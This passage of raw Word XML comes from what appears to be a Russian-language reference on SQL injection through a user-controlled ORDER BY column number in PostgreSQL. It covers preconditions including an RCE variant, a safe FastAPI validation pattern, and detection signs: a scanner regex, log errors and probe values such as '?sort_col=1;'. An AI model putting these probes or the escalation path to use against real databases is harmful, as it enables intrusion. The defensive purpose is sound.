        </w:rPr>
        <w:t>sort_col</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уже валидирован range-check на стороне application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D4A98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01336A1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> syntax существует с SQL92).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7A7330" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любая роль с EXECUTE-доступом к эндпоинту. Для Variant B (RCE) — также </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ИЛИ superuser у application-роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A1C90F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Драйвер для Variant B (stacked):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> simple-protocol режим.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AB3AE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_col</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или эквивалент) без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int()</w:t>
      </w:r>
      <w:r>
        <w:t>-cast + range-check, передаётся через f-string в SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE6D55"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ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартный SQL-синтаксис, используется в hand-written queries (особенно когда select-list expression сложное и неудобно повторять в ORDER BY). Примеры:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B51412" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Legitimate: ORDER BY result of computed expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CFC73C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT user_id, COUNT(*) AS event_count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621B3AB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A74F5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GROUP BY user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329CDCC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 2 DESC;   -- сортировка по event_count, не повторяя выражение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CDD1DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F93838" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Legitimate в reporting tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE9EE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT date_trunc('day', created_at), SUM(amount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0451CBC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51022618" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GROUP BY 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C3A0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB6ADF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В application-коде ORDER BY column_number используется реже, чем column_name (typing-defensive разработчики предпочитают именованные ссылки), но REST-API с pagination + sort часто принимают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_col=N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для compact URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFD3AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Корректный шаблон:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F7F4E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/admin/audit-logs")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7B1B14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_audit_logs(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CAD476" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort_col: int = Query(1, ge=1, le=5),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274598FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    direction: Literal["ASC", "DESC"] = Query("DESC"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340B3838"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2D787E0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0288C465" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E2F9FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, user_id, action, target, occurred_at FROM audit_log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D013B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE occurred_at &gt; now() - interval '30 days'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33450642" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY {sort_col} {direction} LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0DD2F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F622D88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ↑ sort_col гарантированно int 1..5, direction — "ASC"|"DESC"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7479AD6B"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7AFEDB2D"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1E2B508D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDE6CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: f-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY {var}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>var: str</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Регэксп: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY \{[a-z_]+\}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в Python f-strings без проверки типа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564BF514" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от endpoint-а с типичным select-list ≤ 10 колонок; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от endpoint-а где должен быть simple sort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B05D981" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: повторные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от одного IP за короткое время — column-count enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A761083" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP access-log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?sort_col=1;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?sort_col=(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?sort_col=99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — все three не должны проходить FastAPI Query(int, le=N).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E646BF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Все версии PG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> синтаксис существует с SQL92, expression в ORDER BY — с SQL99. Никакие фиксы не закрывают этот класс — application-level mis-configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E1480" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB580CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Error-based via CAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — error-канал через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:t>. Граница: 3.2 описывает error-канал в общем; 3.14.3 — конкретный source error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A9CD3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 UNION-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant A (column-count enumeration) — prerequisite для UNION-extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFF2385" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant B зависит от driver-mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76026920" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant B эскалирует в RCE при наличии privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5587D939" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Boolean-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant C даёт boolean-channel через row-order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A54F6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.1 LIMIT/OFFSET integer-context</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — тот же class integer-context в другом clause.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE4DBC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.4 ORDER BY (CASE WHEN)</w:t>
      </w:r>
      <w:r>
